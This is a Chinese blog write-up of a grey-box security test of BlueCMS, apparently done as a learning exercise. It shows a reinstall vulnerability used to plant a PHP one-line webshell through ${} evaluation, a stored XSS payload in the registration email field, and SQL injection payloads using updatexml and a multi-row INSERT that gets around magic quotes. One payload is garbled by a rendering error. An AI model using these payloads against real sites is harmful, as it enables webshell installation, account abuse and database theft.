bluecms灰盒测试

程序员文章站 2022-05-15 09:15:51

...

bluecms灰盒测试

思路：寻找功能点

bluecms灰盒测试 \

我们安装好bluecms

bluecms灰盒测试

1.重复安装漏洞

我们直接再次访问install

bluecms灰盒测试
发现可以重复安装！
1.这代表，我们能破坏网站
2.可以进入后台
我们可以实施站库分离，我们没用改管理员的账号密码，改了数据库的连接地址

网站，内网比外网弱，后台比前台弱
我们知道他在php5.5以上在可以执行在双引号中出现这个就**${}**就会被当做代码执行
如：

<?php
echo "${phpinfo()}";
?>

我们在安装的时候数据库名字进行一句话木马传参
bluecms灰盒测试
我们输入KaTeX parse error: Expected '}', got 'EOF' at end of input: {_REQUEST[a]}

bluecms灰盒测试
由于我本地并没安装其他高版本的php环境，就这样叭

前端

1.

我们在注册的地方

bluecms灰盒测试
可以**出所有用户名

bluecms灰盒测试

我们在用burp抓包在邮箱处插入

<script>alert(1)</script>

bluecms灰盒测试
发现是一个存储型XSS

bluecms灰盒测试

2.

我们发现注册的时候，存在sql注入：如图
bluecms灰盒测试

2020/5/28 12:54	INSERT INTO blue_user (user_id, user_name, pwd, email, reg_time, last_login_time) VALUES ('', '98798798', md5('98798798'), 'aaa@qq.com', '1590641655', '1590641655')

我们用源代码审计工具中的数据库监控，发现我们可以去尝试进行sql注入

2020/5/28 12:54	INSERT INTO blue_user (user_id, user_name, pwd, email, reg_time, last_login_time) VALUES ('', '98798798', md5('98798798'), '98798798' or updatexml(1,concat(0x7e,(select database())),1),1,1)#@qq.com', '1590641655', '1590641655')

在数据库执行，发现执行成功
我们在抓包在改数据，

bluecms灰盒测试

我们马上尝试直接抓包尝试注入

bluecms灰盒测试
我们打开审计工具，发现存在魔术引号，把我们的’给转义了

2020/5/28 13:29	INSERT INTO blue_user (user_id, user_name, pwd, email, reg_time, last_login_time) VALUES ('', 'admin175', md5('admin175'), 'ad\' or updatexml(1,concat(0x7e,(select database())),1),1,1)#@aaa@qq.com', '1590643772', '1590643772')

我们用宽字节的方法，发现，报错了，无法插入
如果用盲注的话，实在是太头痛了，我们要注册大量账号，而且需要输入验证码

我们用另一种骚操作，尝试能否进入多条数据进行插入,因为存在魔术引号，所以，我们用户名只能进行16进制的编码

INSERT INTO blue_user (user_id, user_name, pwd, email, reg_time, last_login_time) VALUES ('', 'asdasd', md5('98798798'), '98798798' ,1,1),(100,0x6c696261696c69626169,md5(123456),(select database()),1,1)#@qq.com', '1590641655', '1590641655')